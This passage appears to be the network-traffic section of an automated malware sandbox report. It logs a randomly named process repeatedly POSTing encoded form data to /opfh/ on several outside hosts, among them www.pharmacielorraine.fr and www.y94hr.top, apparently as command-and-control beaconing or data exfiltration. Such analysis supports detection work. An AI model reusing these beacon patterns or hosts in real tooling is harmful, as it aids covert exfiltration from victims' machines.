6c 37 56 46 50 4b 6c 30 34 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R40L6=+hpa9HKLtxeYEKNNXPI5VBSfdFDUoaiCusvmIOnHC/L+zjqEV17vBkaVEMb7DgIovUP6hhFd7FyMm1q4LBIs3FeHHcdJlscr/I16R146dIQqVis5Y3/utpIuSORveCYceuc/vKNgK8Bg&b2PX=hZXl7VFPKl04"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.7	63210	91.195.240.92	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:20.177505016 CEST	735	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pharmacielorraine.fr Origin: http://www.pharmacielorraine.fr Referer: http://www.pharmacielorraine.fr/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 52 73 53 6c 51 4f 6c 56 58 72 48 2f 78 65 57 64 52 37 44 71 59 70 49 4e 51 78 62 47 45 33 6b 39 79 4d 35 2b 78 66 6d 72 33 66 6d 7a 30 79 4a 4c 38 39 49 42 73 69 46 37 4e 74 35 74 43 62 44 36 35 78 30 45 77 66 41 71 74 32 6c 4c 51 6d 4d 42 2b 4d 71 4d 50 6e 67 53 43 4d 56 4e 65 4a 6d 70 4f 70 39 7a 58 6f 35 71 79 34 67 38 39 78 69 4b 6f 35 54 69 78 6a 48 71 6a 69 48 4e 52 46 4c 48 32 62 55 62 47 47 44 79 42 4f 33 54 79 69 42 65 6d 70 32 52 79 6a 6b 61 58 55 42 6e 75 33 46 46 44 30 4a 52 49 6e 7a 32 4e 79 42 54 6a 52 53 72 36 4f 68 58 76 39 67 58 55 4b 30 2f 5a 4d 61 59 45 53 5a 6a 33 77 3d 3d Data Ascii: R40L6=IrlOfZWiiCe+RsSlQOlVXrH/xeWdR7DqYpINQxbGE3k9yM5+xfmr3fmz0yJL89IBsiF7Nt5tCbD65x0EwfAqt2lLQmMB+MqMPngSCMVNeJmpOp9zXo5qy4g89xiKo5TixjHqjiHNRFLH2bUbGGDyBO3TyiBemp2RyjkaXUBnu3FFD0JRInz2NyBTjRSr6OhXv9gXUK0/ZMaYESZj3w==
May 27, 2024 12:23:20.821274996 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Mon, 27 May 2024 10:23:20 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.7	63211	91.195.240.92	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:22.712028027 CEST	755	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pharmacielorraine.fr Origin: http://www.pharmacielorraine.fr Referer: http://www.pharmacielorraine.fr/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 51 50 4b 6c 57 70 35 56 63 72 47 4e 39 2b 57 64 47 72 43 43 59 6f 30 4e 51 30 69 42 45 6b 41 39 79 6f 31 2b 77 63 2b 72 77 66 6d 7a 2f 53 4a 4f 78 64 49 4b 73 69 49 45 4e 6f 52 74 43 62 58 36 35 30 51 45 78 73 6f 70 76 6d 6c 4a 59 47 4e 48 77 73 71 4d 50 6e 67 53 43 4d 41 46 65 4a 75 70 4f 5a 4e 7a 46 64 56 6c 34 59 67 39 31 52 69 4b 73 35 54 6d 78 6a 48 49 6a 6a 62 6e 52 47 7a 48 32 61 6b 62 49 30 6e 31 50 4f 33 64 38 43 41 36 6f 34 50 5a 39 57 77 64 51 33 6c 64 68 32 41 6c 43 43 55 7a 53 46 2f 61 54 6a 35 6f 6e 54 32 64 74 6f 38 69 74 38 6b 50 5a 6f 41 65 47 37 2f 79 4a 41 34 6e 68 4d 47 45 55 53 64 7a 7a 48 4b 77 46 32 2f 54 44 62 47 63 6d 4a 41 3d Data Ascii: R40L6=IrlOfZWiiCe+QPKlWp5VcrGN9+WdGrCCYo0NQ0iBEkA9yo1+wc+rwfmz/SJOxdIKsiIENoRtCbX650QExsopvmlJYGNHwsqMPngSCMAFeJupOZNzFdVl4Yg91RiKs5TmxjHIjjbnRGzH2akbI0n1PO3d8CA6o4PZ9WwdQ3ldh2AlCCUzSF/aTj5onT2dto8it8kPZoAeG7/yJA4nhMGEUSdzzHKwF2/TDbGcmJA=
May 27, 2024 12:23:23.357072115 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Mon, 27 May 2024 10:23:23 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
May 27, 2024 12:23:23.660245895 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Mon, 27 May 2024 10:23:23 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.7	63212	91.195.240.92	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:26.732769012 CEST	1768	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.pharmacielorraine.fr Origin: http://www.pharmacielorraine.fr Referer: http://www.pharmacielorraine.fr/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 49 72 6c 4f 66 5a 57 69 69 43 65 2b 51 50 4b 6c 57 70 35 56 63 72 47 4e 39 2b 57 64 47 72 43 43 59 6f 30 4e 51 30 69 42 45 6b 49 39 79 39 70 2b 78 39 2b 72 78 66 6d 7a 77 43 4a 50 78 64 49 62 73 69 41 41 4e 6f 63 51 43 64 62 36 34 53 63 45 67 74 6f 70 6c 6d 6c 4a 48 32 4d 41 2b 4d 72 4f 50 6d 51 73 43 4d 51 46 65 4a 75 70 4f 66 4a 7a 47 49 35 6c 72 49 67 38 39 78 69 38 6f 35 53 37 78 6a 66 79 6a 6a 66 64 51 32 54 48 32 36 30 62 46 6d 2f 31 48 4f 33 66 2f 43 41 69 6f 35 7a 57 39 57 45 6e 51 32 51 36 68 30 41 6c 4f 6b 4e 5a 41 42 76 6a 4a 68 6c 6f 6d 41 47 50 6d 62 77 30 6c 36 59 58 47 71 6b 79 4a 37 6e 74 45 53 59 73 6a 70 37 37 49 45 6f 4d 36 33 75 36 4e 67 53 47 62 34 61 2f 36 64 30 33 76 58 2f 67 73 31 35 65 66 57 6e 6a 43 5a 54 75 6e 6b 59 68 2f 4c 6f 59 78 71 31 67 2b 34 31 77 6d 6a 78 58 42 79 42 2f 33 47 4b 46 30 5a 61 4f 38 64 55 52 52 75 48 44 43 56 36 4c 62 69 78 43 57 6d 4e 55 52 65 48 4f 69 76 4c 59 2b 73 4a 74 39 66 68 77 45 2b 56 6e 68 53 65 72 34 55 63 48 52 34 63 6c [TRUNCATED] Data Ascii: R40L6=IrlOfZWiiCe+QPKlWp5VcrGN9+WdGrCCYo0NQ0iBEkI9y9p+x9+rxfmzwCJPxdIbsiAANocQCdb64ScEgtoplmlJH2MA+MrOPmQsCMQFeJupOfJzGI5lrIg89xi8o5S7xjfyjjfdQ2TH260bFm/1HO3f/CAio5zW9WEnQ2Q6h0AlOkNZABvjJhlomAGPmbw0l6YXGqkyJ7ntESYsjp77IEoM63u6NgSGb4a/6d03vX/gs15efWnjCZTunkYh/LoYxq1g+41wmjxXByB/3GKF0ZaO8dURRuHDCV6LbixCWmNUReHOivLY+sJt9fhwE+VnhSer4UcHR4clk9UDXEF9GdFbHqmYQqFe4FlWDEG3RDoERW7ngAcq+oI+za9e7SgpJTjX5z/V4Tcb8akI9eiNFTHf0EM51JrBZGYi+34RYziSx7bTHHCaBHDZSnpRquUDpafvH2HK7g4fWmkUu6kfzc+tdDsQEmbTkp0A+gFqoW6YnJXmBh6zcoaHQNCrIHrtPYJ8QZT1LuWaOf6C/UOzF50IFZRdLGnRJ0JHZmWdQbHSYMRdRKFAqsSjf9ynZJasWc28dxy2KGXmeP6TEu9vwqsuT056jVEmzFHm2XLAYivQJu7muxOoAyd53+1/LxrYKsJTn40PtkjNLF9UbfzJynQDbWzkKK1AgomcbUTr9YUDuTqciPJxayQJw+wymqpK2pC9o5eUwmrCjiTDghVW46wdFTQ5HLdfR0Ij+eDN904lnKC7m+976cyUQHCYDAxwhEzxZdxjiw+XSvyPPL3dvqt1tpTSykFYNPv1DJKLeBygXYMv9ctUR1vUCcGP/D5q9t45FpCgcOO96+gr1M3A5Kxm9YenLgLwf3RZmDMYAJbV7ZChzFccKjQh2fuUdHZHehe/SrnwVabe9Zox0SD1MbKU0U44bQa/VsjUKIuFGIv2+HnHRUp3vUleW/FIXsNJ+8q0Eq4PTvOnfTnGR8J7ZEZ+r2eLLInOp1ZdO92qhR44Do [TRUNCATED]
May 27, 2024 12:23:27.369196892 CEST	299	IN	HTTP/1.1 405 Not Allowed date: Mon, 27 May 2024 10:23:27 GMT content-type: text/html content-length: 154 server: NginX connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	63213	91.195.240.92	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:29.267343044 CEST	464	OUT	GET /opfh/?R40L6=FpNucvzIjWOmZMmiXb56c6bY69+Kb+n3d8h+TlHEUGgG180M1/D8mOTG6mRn1YM4wyonPK4hNo3l6hpm9fEjrGx3GgV25NLdT3AKPeddSoL4M+kWNe1Dr4885y6woZHnwBfR8wPvVVyX&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.pharmacielorraine.fr Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
May 27, 2024 12:23:29.914674997 CEST	107	IN	HTTP/1.1 439 date: Mon, 27 May 2024 10:23:29 GMT content-length: 0 server: NginX connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	63214	38.47.207.149	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:34.953430891 CEST	702	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.y94hr.top Origin: http://www.y94hr.top Referer: http://www.y94hr.top/opfh/ Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 61 5a 39 66 6b 72 32 65 62 39 33 76 32 42 4b 49 73 58 76 32 41 59 65 7a 54 33 32 4e 61 51 32 46 72 45 4b 42 41 71 33 4c 70 45 4e 69 7a 31 69 51 55 4f 68 75 38 39 2b 6e 68 43 62 59 55 63 45 73 67 59 48 7a 57 7a 78 63 37 6f 2f 4d 37 69 69 68 30 42 43 43 2b 70 39 76 63 4a 7a 37 68 6e 71 4d 74 2b 69 6a 47 37 6a 2b 32 43 78 47 36 39 39 45 78 38 4c 6d 41 7a 50 43 59 42 66 41 34 2f 4a 48 56 69 36 65 44 6b 77 78 72 4e 69 47 76 6e 6f 33 48 43 64 6c 32 6d 65 43 33 59 70 66 44 7a 56 34 77 74 6d 50 4c 57 6f 45 4c 47 4b 76 38 41 39 30 62 32 7a 4d 36 4c 38 65 63 39 4d 67 4f 72 56 33 51 6b 6a 70 41 3d 3d Data Ascii: R40L6=zO4oiP/i6dMo3aZ9fkr2eb93v2BKIsXv2AYezT32NaQ2FrEKBAq3LpENiz1iQUOhu89+nhCbYUcEsgYHzWzxc7o/M7iih0BCC+p9vcJz7hnqMt+ijG7j+2CxG699Ex8LmAzPCYBfA4/JHVi6eDkwxrNiGvno3HCdl2meC3YpfDzV4wtmPLWoELGKv8A90b2zM6L8ec9MgOrV3QkjpA==
May 27, 2024 12:23:35.859523058 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:35 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	63215	38.47.207.149	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:37.487536907 CEST	722	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.y94hr.top Origin: http://www.y94hr.top Referer: http://www.y94hr.top/opfh/ Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 36 46 39 59 44 66 32 50 4c 39 30 7a 47 42 4b 42 4d 58 72 32 41 45 65 7a 57 58 6d 4d 6f 45 32 45 4a 63 4b 54 42 71 33 49 70 45 4e 70 54 31 6a 4e 6b 4f 71 75 38 78 4d 6e 6a 57 62 59 55 49 45 73 68 6f 48 7a 46 72 2b 64 72 6f 39 5a 72 69 67 2b 6b 42 43 43 2b 70 39 76 63 64 5a 37 6c 4c 71 4e 64 75 69 69 6e 37 67 39 32 43 77 48 36 39 39 4f 52 39 43 6d 41 7a 68 43 5a 73 79 41 37 48 4a 48 51 65 36 65 79 6b 7a 6f 62 4e 6b 5a 2f 6d 6e 2b 48 79 57 71 57 36 48 45 33 73 6a 46 67 33 6a 77 6d 77 45 56 70 61 45 61 61 2b 78 72 2b 6b 4c 6a 39 72 47 4f 37 50 6b 54 2b 4a 74 2f 35 4f 2f 36 43 46 6e 2f 7a 50 4a 59 51 55 30 6c 34 41 4e 54 42 79 4f 66 4e 73 35 73 38 55 3d Data Ascii: R40L6=zO4oiP/i6dMo36F9YDf2PL90zGBKBMXr2AEezWXmMoE2EJcKTBq3IpENpT1jNkOqu8xMnjWbYUIEshoHzFr+dro9Zrig+kBCC+p9vcdZ7lLqNduiin7g92CwH699OR9CmAzhCZsyA7HJHQe6eykzobNkZ/mn+HyWqW6HE3sjFg3jwmwEVpaEaa+xr+kLj9rGO7PkT+Jt/5O/6CFn/zPJYQU0l4ANTByOfNs5s8U=
May 27, 2024 12:23:38.393469095 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:38 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	63216	38.47.207.149	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:40.021313906 CEST	1735	OUT	POST /opfh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: www.y94hr.top Origin: http://www.y94hr.top Referer: http://www.y94hr.top/opfh/ Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 52 34 30 4c 36 3d 7a 4f 34 6f 69 50 2f 69 36 64 4d 6f 33 36 46 39 59 44 66 32 50 4c 39 30 7a 47 42 4b 42 4d 58 72 32 41 45 65 7a 57 58 6d 4d 6f 63 32 45 36 55 4b 51 6d 2b 33 4a 70 45 4e 6d 44 31 6d 4e 6b 4f 37 75 38 70 49 6e 6a 4c 73 59 53 4d 45 6a 6e 55 48 6b 6b 72 2b 58 72 6f 39 62 72 69 6c 68 30 42 58 43 2b 34 31 76 63 4e 5a 37 6c 4c 71 4e 66 47 69 32 47 37 67 78 57 43 78 47 36 39 78 45 78 39 75 6d 41 62 58 43 5a 59 45 41 4c 6e 4a 41 30 43 36 4e 67 4d 7a 33 72 4e 6d 61 2f 6e 34 2b 48 2f 4f 71 57 32 68 45 33 6f 61 46 69 33 6a 68 79 59 63 51 34 2f 63 41 71 58 77 74 38 73 38 68 66 6e 4c 50 62 54 49 51 4d 31 74 2f 2b 61 59 32 6a 35 50 32 6b 71 4f 59 79 34 67 70 4a 30 57 65 6e 6e 66 44 59 6f 42 79 4a 38 66 44 55 4f 35 44 35 44 31 41 7a 61 74 51 7a 77 52 6c 5a 51 64 6f 6c 72 70 71 71 66 71 70 6e 58 6e 78 6f 5a 67 2f 51 55 73 69 74 30 66 78 56 4e 58 32 57 34 38 65 65 46 57 38 54 45 47 76 4d 6b 38 48 72 59 33 76 53 71 73 42 36 47 6d 78 43 67 61 47 45 67 79 61 6b 34 65 4f 53 46 51 76 4a 45 61 58 2f 69 67 [TRUNCATED] Data Ascii: R40L6=zO4oiP/i6dMo36F9YDf2PL90zGBKBMXr2AEezWXmMoc2E6UKQm+3JpENmD1mNkO7u8pInjLsYSMEjnUHkkr+Xro9brilh0BXC+41vcNZ7lLqNfGi2G7gxWCxG69xEx9umAbXCZYEALnJA0C6NgMz3rNma/n4+H/OqW2hE3oaFi3jhyYcQ4/cAqXwt8s8hfnLPbTIQM1t/+aY2j5P2kqOYy4gpJ0WennfDYoByJ8fDUO5D5D1AzatQzwRlZQdolrpqqfqpnXnxoZg/QUsit0fxVNX2W48eeFW8TEGvMk8HrY3vSqsB6GmxCgaGEgyak4eOSFQvJEaX/igztAoEcbbFnyBis76I/G6NogDcbhGiiRLz7E5qq28HdXr40iuMWN07XxLQn7UToAMXSfu9rP34WR+CyYZK5t2IBj4NkZoRvExULFp9y0/zSzNkC88M5pmeYIy11WMpfq2GlmBw4WE8NwiGb/STwlXYA9O7MzHWUdkgaUrT0oRHRYGoxn9jju1VBTunCEPuLEqT6wVfBkDeGMbotd5O+wGG1/oUBqYYQDaBUzk9osHyq5oJ9P5iNY1qz3BMEshcV9gY2UFMKTAYVZo6J2sVhO11CKQF3WF6/v4HyRv7hDfl4JnMnUieAi1JZ48b15MwWc599lhIJ6h2BgwlnqAdaJwjDKuidtGiGWyohXJwgRsobNrIA2z1SzYuytrZYR7EAAxwDmCUvmp02QgK7SJW5QvFNdeXPAsG+TxHeNyEPK2xuxCOAws1f2FMsn80Lj5f/vVwAso+ate+Z0MzEMOvqE9t6vL3WWtCRSl2kq9GDSxnbNMWarpJ1ClaAu7CGgjxy8dSxhazHR73NdywLp4+rudAGPK8MCuay6Yrz1fPIqsBqkxoQdzbf9QCozUJhfzphpe/Nw3HkmqxSgRTfPsL4hrnMhUwo223O+rl23PVZUZ7Gbx23F0yyS3h08cSsmy+PLXLECHY0eubkF1uIWUNfYbD8LsXhe2IZaiEK [TRUNCATED]
May 27, 2024 12:23:40.924274921 CEST	289	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 27 May 2024 10:23:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	63217	38.47.207.149	80	2780	C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 12:23:42.952230930 CEST	453	OUT	GET /opfh/?R40L6=+MQIh7XosrcV1YUvfmXLRZp9qVlVCaTixn9Z4SHGNrQWXqYuOwa/VK9HsnlVTmeIhuhJsBbQG3swuyVkvGLKXJd4NOCZwBpwFucJm+lE/1jiLpvFuFHXohi2H4hODzVegRzQFrQhMICC&b2PX=hZXl7VFPKl04 HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Host: www.y94hr.top Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
